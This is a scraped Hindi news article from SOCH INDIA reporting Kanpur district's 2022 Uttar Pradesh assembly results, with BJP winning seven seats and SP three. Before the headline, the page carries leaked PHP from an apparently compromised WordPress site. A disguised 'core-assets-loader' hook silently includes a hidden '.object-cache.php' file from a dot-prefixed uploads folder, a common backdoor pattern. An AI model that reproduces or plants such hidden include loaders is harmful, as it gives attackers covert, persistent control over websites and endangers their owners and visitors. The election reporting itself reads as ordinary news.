add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); UP Election Result: भाजपा सात, सपा तीन, बसपा-कांग्रेस का सूपड़ा साफ, कानपुर में खेली गई भगवा होली, देखें तस्वीरें – SOCH INDIA
Menu

UP Election Result: भाजपा सात, सपा तीन, बसपा-कांग्रेस का सूपड़ा साफ, कानपुर में खेली गई भगवा होली, देखें तस्वीरें

nobanner

कानपुर जिले की सभी 10 विधानसभा सीटों पर आए परिणाम 2017 के विधानसभा चुनाव जैसे ही रहे। भाजपा के खाते में वही सात सीटें आई हैं, जिस पर उसने पिछली बार जीत हासिल की थी। सपा को एक सीट की बढ़त हासिल हुई है। उसने तीन सीटें जीती हैं। पिछली बार एक सीट जीतने वाली कांग्रेस का पत्ता यहां से पूरी तरह से साफ हो गया। बसपा पिछले चुनाव की तरह इस बार भी एक भी सीट नहीं जीत पाई।

किदवईनगर सीट पर पहले तो भाजपा और कांग्रेस में टक्कर देखने को मिली। लेकिन जैसे-जैसे मतों की गिनती बढ़ती गई, कांग्रेस खेमे में मायूसी छाती रही। यहां से भाजपा के महेश त्रिवेदी ने लगातार दूसरी बार कांग्रेस के अजय कपूर को हराकर जीत दर्ज की।

गोविंदनगर सीट पर भाजपा की जीत पहले से ही तय थी लेकिन दूसरे स्थान पर कांग्रेस की जगह सपा का आना चौंकाने वाला रहा। यहां से भाजपा के सुरेंद्र मैथानी दोबारा विधायक बने। इसी तरह सीसामऊ से सपा के इरफान सोलंकी ने भी एकतरफा जीत हासिल की।

उन्होंने भाजपा प्रत्याशी सलिल विश्नोई को मात दी। सोलंकी परिवार को छठवीं बार विधायकी मिली है। बिठूर में भी मुकाबला भाजपा-सपा के बीच ही रहा, लेकिन भाजपा के अभिजीत सिंह सांगा ने शुरू से ही बढ़त बनाकर रखी। आखिरकार दोबारा विधायक बने। घाटमपुर में भाजपा समर्थित अपना दल की सरोज कुरील और बिल्हौर सीट पर भाजपा के राहुल बच्चा सोनकर पहली बार विधायक बने